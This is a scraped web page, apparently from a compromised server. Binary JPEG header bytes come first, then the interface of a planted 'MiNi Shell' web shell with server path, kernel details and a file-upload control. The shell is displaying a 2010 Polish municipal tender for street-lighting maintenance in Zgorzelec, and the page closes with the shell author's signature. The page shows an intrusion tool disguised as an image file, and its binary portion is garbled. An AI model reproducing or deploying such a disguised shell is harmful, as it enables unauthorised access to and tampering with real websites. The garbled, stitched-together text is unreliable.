JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100726/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100726/223924-N-2010.html

<p class="kh_header"><b>Zgorzelec: Konserwacja oświetlenia ulicznego na terenie Gminy Miejskiej Zgorzelec</b><br>
<b>Numer ogłoszenia: 223924 - 2010; data zamieszczenia: 26.07.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miejska Zgorzelec , ul. Domańskiego 7, 59-900 Zgorzelec, woj. dolnośląskie, tel. 0-75 77 56 988, faks 075 77 56 988.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.um-zgorzelec.dolnyslask.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Konserwacja oświetlenia ulicznego na terenie Gminy Miejskiej Zgorzelec.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest wykonywanie usług polegających na  konserwacji 
    oświetlenia ulicznego na terenie  Gminy Miejskiej Zgorzelec.

2. Zamówieniem objętych jest 2412 punktów świetlnych i 66 SOU - szafek 
    oświetlenia ulicznego, których szczegółową lokalizację zawiera załącznik nr 9 do 
    SIWZ. 

3. Szczegółowy zakres czynności konserwacyjnych oświetlenia drogowego obejmuje:
    1) obsługę i przeglądy techniczne urządzeń aparatury zasilającej i 
        zabezpieczającej, pomiarowej i sterowniczej w szafkach oświetleniowych, 
        wykonywane minimum 1 raz w miesiącu, potwierdzone przez Wykonawcę 
        raportem z wykonanych czynności, dołączonym do faktury z miesiąca 
        wykonania, 
    2) stałą dbałość  o estetykę urządzeń oświetlenia drogowego w tym: czyszczenie 
        opraw systemów optycznych, mycie kloszy, usuwanie pajęczyn, owadów oraz 
        plakatów ze słupów i szafek oświetleniowych itp. 
    3) przeglądy techniczne opraw i wnęk latarni, 
    4) awaryjne usuwanie uszkodzeń i nieprawidłowości w działaniu oświetlenia, w 
        terminie  do 24 godzin, a w przypadku awarii polegającej na ciągłym świeceniu 
        lamp w terminie do 12 godzin od chwili zgłoszenia telefonicznego lub faksowego 
        przez Zamawiającego.
        Wykonawca zobowiązany jest każdorazowo potwierdzić faksem przyjęcie w/w 
        zgłoszenia. 
        Wykonawca każdorazowo przedstawi Zamawiającemu pisemne zawiadomienie
        o fakcie i terminie usunięcia zgłoszonej awarii, w dniu usunięcia awarii.
    5) likwidację wszelkich awarii w urządzeniach oświetlenia takich jak: zużyte 
        źródła światła, uszkodzone wyposażenie opraw (dławiki, układy zapłonowe, 
        oprawki, zaciski, gniazda i wkładki bezpiecznikowe), 
    6) usuwanie w trybie natychmiastowym zagrożeń bezpieczeństwa ruchu 
        drogowego oraz zdrowia i życia ludzi, spowodowanych przez urządzenia 
        oświetleniowe,                         
    7) kontrolę stanu oświetlenia drogowego tj. 2412 punktów świetlnych,  w porze 
        nocnej, nie rzadziej niż raz w miesiącu. 
        Zobowiązuje się Wykonawcę do sporządzenia raportu z dokonanej kontroli 
        stanu oświetlenia wraz z wykazem stwierdzonych usterek, który należy 
        dołączyć do faktury z miesiąca wykonania kontroli. 
    8) ustalanie lokalizacji i usuwanie nielegalnych podłączeń do sieci oświetleniowej, 
        z każdorazowym pisemnym powiadomieniem Zamawiającego o tym zdarzeniu,   
    9) regulację położenia opraw i odbłyśników, kontrolę stanu technicznego słupów 
        oświetleniowych: 
        a) sprawdzenie połączeń na tabliczce zaciskowej, oczyszczanie śrub, 
            podkładek, nakrętek i końcówek kablowych, 
        b) sprawdzanie rodzaju i wielkości zabezpieczeń, w razie konieczności ich 
            wymiana lub uzupełnienie, 
        c) uzupełnienie zamknięć wnęk słupowych, 
        d) sprawdzanie posadowienia i przywracanie pionowości słupów, 
            zabezpieczenie oraz uzupełnienie fundamentów latarń i powierzchni słupów 
            betonowych, 
        e) uzupełnianie numeracji słupów, 
  10)  wykonanie pomiarów skuteczności ochrony przeciwporażeniowej oraz pomiarów
         rezystencji izolacji (wszystkich obwodów oświetleniowych), potwierdzone 
         protokołem przekazanym dla Zamawiającego - w terminie do końca trwania 
         umowy, przy czym w pierwszym roku  od dnia podpisania umowy należy 
         wykonać w/w pomiary w ilości min. 33 SOU wraz z powiązanymi z nimi 
         obwodami.  
  11) utylizację zużytych źródeł światła, opraw, elementów sterowania, zabezpieczeń 
       itp.,zgodnie z obowiązującymi w tym zakresie przepisami. 
       Wykonawca przedstawi Zamawiającemu potwierdzenie faktu utylizacji 
       zużytych elementów oświetleniowych, zgodnie z powszechnie obowiązującymi 
       przepisami.                
  12) wykonywanie innych  czynności  takich jak:
       a) uzupełnianie oraz zabezpieczanie cokołów pod szafkami sterowniczymi, 
       b) sprawdzanie stanu linek nośnych oraz zacisków, 
       c) sprawdzanie stanu technicznego mocowania szafek sterowniczych, 
       d) sprawdzanie stanu technicznego aparatury sterowniczej i nastawianie 
           zegarów sterujących, 
       e) wymiana lub montaż tabliczek informacyjnych i ostrzegawczych, 
       f) wymiana wkładek topikowych, gniazd bezpiecznikowych, wymiana lub 
          naprawa uszkodzonych podstaw bezpiecznikowych słupowych, wymiana 
          przewodów zasilających oprawy, 
      g) przycinanie gałęzi lub konarów drzew zasłaniających oprawy oświetleniowe, po
          uprzednim uzyskaniu wymaganych prawem zezwoleń, 
      h) inne niewymienione  w pkt. 3 czynności niezbędne do prawidłowego 
          wykonania  przedmiotu zamówienia.
   4. Wykonawca jako wytwórca odpadów w rozumieniu ustawy o odpadach, ma 
       obowiązek zagospodarowania odpadów powstałych podczas realizacji niniejszego
       zamówienia, zgodnie z ustawą o odpadach z dnia 27 kwietnia 2001r. (tekst 
       jednolity  z 2007r. Dz. U. Nr 39, poz. 251 z póź. zm.) i ustawą z dnia 
       27.04.2001r. Prawo ochrony środowiska (tekst jednolity z 2008r., Nr 25, 
       poz.150).  
  5. Do wykonania przedmiotu zamówienia określonego  w pkt. 3.3 SIWZ 
      Wykonawca użyje materiałów  własnych. 
   6. Zaleca się, aby Wykonawca dokonał oględzin terenu związanego z realizacją 
       przedmiotu  zamówienia, dokładnie zapoznał się z treścią dokumentów 
       przetargowych, celem  prawidłowego sporządzenia oferty oraz właściwego 
       wykonania przedmiotu zamówienia.   Wizję lokalną  Wykonawca dokona na   
       koszt własny..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Usługi polegające na powtórzeniu tego samego rodzaju zamówień, stanowiące nie więcej niż 50% wartości zamówienia podstawowego, zgodnie z art. 67 ust.1 pkt.6.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 50.23.21.00-1, 50.23.21.10-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 24.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żąda od wykonawców wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1) Ocena spełnienia warunków udziału w postępowaniu dokonana zostanie zgodnie z 
     metodą  spełnia/nie spełnia,  w oparciu o przedłożone przez Wykonawców 
    dokumenty i oświadczenia.   
2) Oferty Wykonawców, którzy przedłożą dokumenty i oświadczenia potwierdzające 
    spełnienie wymaganych warunków zostaną dopuszczone do badania i oceny. 
3) Z treści załączonych dokumentów musi wynikać jednoznacznie, iż Wykonawca
    spełnia warunki określone przez Zamawiającego. Wykonawcy, którzy nie 
    przedłożą dokumentów i oświadczeń potwierdzających spełnienie warunków 
    udziału w postępowaniu zostaną wykluczeni z postępowania z zastrzeżeniem art. 
    26 ust. 3 ustawy Pzp. 
4) Jako spełniający warunek udziału w postępowaniu zostaną ocenieni wykonawcy, 
    którzy wykażą  wykonanie lub wykonywanie 3 usług polegających na konserwacji 
    urządzeń  oświetlenia ulicznego, obejmujących  łącznie  min. 2400 punktów 
    świetlnych</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1) Ocena spełnienia warunków udziału w postępowaniu dokonana zostanie zgodnie z 
     metodą  spełnia/nie spełnia,  w oparciu o przedłożone przez Wykonawców 
    dokumenty i oświadczenia.   
2) Oferty Wykonawców, którzy przedłożą dokumenty i oświadczenia potwierdzające 
    spełnienie wymaganych warunków zostaną dopuszczone do badania i oceny. 
3) Z treści załączonych dokumentów musi wynikać jednoznacznie, iż Wykonawca
    spełnia warunki określone przez Zamawiającego. Wykonawcy, którzy nie 
    przedłożą dokumentów i oświadczeń potwierdzających spełnienie warunków 
    udziału w postępowaniu zostaną wykluczeni z postępowania z zastrzeżeniem art. 
    26 ust. 3 ustawy Pzp. 
4) Jako spełniający warunek udziału w postępowaniu zostaną ocenieni wykonawcy, 
    którzy wykażą, iż dysponują:
    a)   samochodem  specjalistycznym z podnośnikiem koszowym o wysokości 
          roboczej min. 12 metrów, 
    b)   samochodem ciężarowym o ładowności min. 4,5 t, 
    c)	  samochodem dostawczym o ładowności min.  0,9 t.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1) Ocena spełnienia warunków udziału w postępowaniu dokonana zostanie zgodnie z 
     metodą  spełnia/nie spełnia,  w oparciu o przedłożone przez Wykonawców 
    dokumenty i oświadczenia.   
2) Oferty Wykonawców, którzy przedłożą dokumenty i oświadczenia potwierdzające 
    spełnienie wymaganych warunków zostaną dopuszczone do badania i oceny. 
3) Z treści załączonych dokumentów musi wynikać jednoznacznie, iż Wykonawca
    spełnia warunki określone przez Zamawiającego. Wykonawcy, którzy nie 
    przedłożą  dokumentów i oświadczeń potwierdzających spełnienie warunków 
    udziału w postępowaniu zostaną wykluczeni z postępowania z zastrzeżeniem art. 
    26 ust. 3 ustawy Pzp. 
3) Jako spełniający warunek udziału w postępowaniu zostaną ocenieni Wykonawcy, 
    którzy wykażą, iż dysponują: 
    a) min. 1 osobą,  która będzie wykonywać przedmiot zamówienia,  posiadającą 
        uprawnienia  budowlane do kierowania robotami w specjalnosci instalacyjnej w 
        zakresie  sieci, instalacji i urzadzeń elektrycznych i elektroenergetycznych, 
    b)  min. 2 osobami, które będą wykonywac przedmiot zamówienia posiadającymi 
         uprawnienia elektryczne  E do 1 kV, 
    c) min. 1 osobą, która będzie wykonywać przedmiot zamówienia posiadającą 
        uprawnienia do obsługi podnośnika koszowego w wysokości roboczej min. 12 
        metrów.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Do oferty Wykonawca musi załączyć następujące dokumenty:   
1)  wypełniony i podpisany formularz Oferta (wg. załączonego wzoru), 
2)  informacja  na temat Wykonawcy (wg zał. wzoru ) - załącznik nr 1 do SIWZ
     (w przypadku złożenia oferty wspólnej, dokument składa każdy z członków 
     konsorcjum), 
3)  oświadczenie Wykonawcy z art. 36 ust. 4 ustawy z dnia 29.01.2004r. Prawo  
     zamówień   publicznych - załącznik nr 2 do SIWZ, 
     W przypadku nie dołączenia do oferty powyższego załącznika, bądź jego nie 
     wypełnienia, Zamawiający uzna, że Wykonawca wykona zamówienie
     własnymi siłami.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zamawiający przewidział możliwość dokonania zmian postanowień umowy,  przy 
    czym warunki takiej zmiany Zamawiający określił  w § 9 projektu umowy. 
    Zakres przewidzianych zmian: 
    1) Termin  określony w pkt. 4 SIWZ i § 2 ust.1 projektu umowy ulegnie  
        przesunięciu w  przypadku wystąpienia opóźnień wynikających z:  
        a) opóźnień zawinionych przez Zamawiającego, tzn. jeżeli takie opóźnienie jest 
            lub będzie miało wpływ na termin realizacji przedmiotu umowy,       
        b) zaistnienia przypadku działania siły wyższej, przez którą rozumieć należy 
            zdarzenie zewnętrzne o charakterze: niezależnym od stron, którego strony 
            nie mogły przewidzieć przed zawarciem umowy i którego nie można uniknąć 
            ani któremu strony nie mogły zapobiec przy zachowaniu należytej 
            staranności, której nie można przypisać drugiej stronie. 
            Za siłę wyższą warunkującą zmianę umowy uważać się będzie w 
            szczególności:powódź, pożar i inne klęski żywiołowe, zamieszki, strajki (nie 
            dotyczą pracowników Wykonawcy), ataki terrorystyczne, działania wojenne, 
            nagłe przerwy w dostawie energii elektrycznej, promieniowanie, lub 
            skażenia, 
        c)  wstrzymania prac  przez uprawnione organy,          
    2) Zmiana osób wskazanych w umowie z imienia i nazwiska odpowiedzialnych za 
        realizację umowy, o których mowa w § 8 ust. 1 i 2  projektu umowy.
2.W przedstawionych w punkcie  1 podpunkt 1 przypadkach wystąpienia opóźnień,   
   strony ustalają nowe terminy realizacji niniejszej umowy, z tym, że okres  
   przesunięcia terminu realizacji przedmiotu umowy równy będzie co najmniej 
   okresowi przerwy lub postoju. 
3.Warunkiem wprowadzenia zmian do zawartej umowy będzie potwierdzenie 
   powstałych okoliczności w formie opisowej i właściwie umotywowanej, 
   potwierdzonej przez każdą ze stron umowy. 
4.Strona ubiegająca się o zmianę umowy w w/w przypadkach, winna zwrócić się do  
   Wykonawcy/Zamawiającego w formie pisemnej z wnioskiem,  o wprowadzenie 
   zmian  w umowie aneksem, w  terminie 7 dni od daty zaistniałej zmiany.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.bip.um-zgorzelec.dolnyslask.pl/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Zgorzelec
Wydział Zamówień Publicznych
59-900 Zgorzelec ul. Domańskiego 6 pokój 6.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 03.08.2010 godzina 11:00, miejsce: Urząd Miasta Zgorzelec
59-900 Zgorzelec
ul. Domańskiego 7
Punkt Obsługi Interesanta.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com